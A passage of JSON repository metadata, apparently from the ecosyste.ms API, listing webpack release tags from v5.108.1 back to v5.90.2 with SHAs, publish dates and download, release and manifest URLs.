6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"depen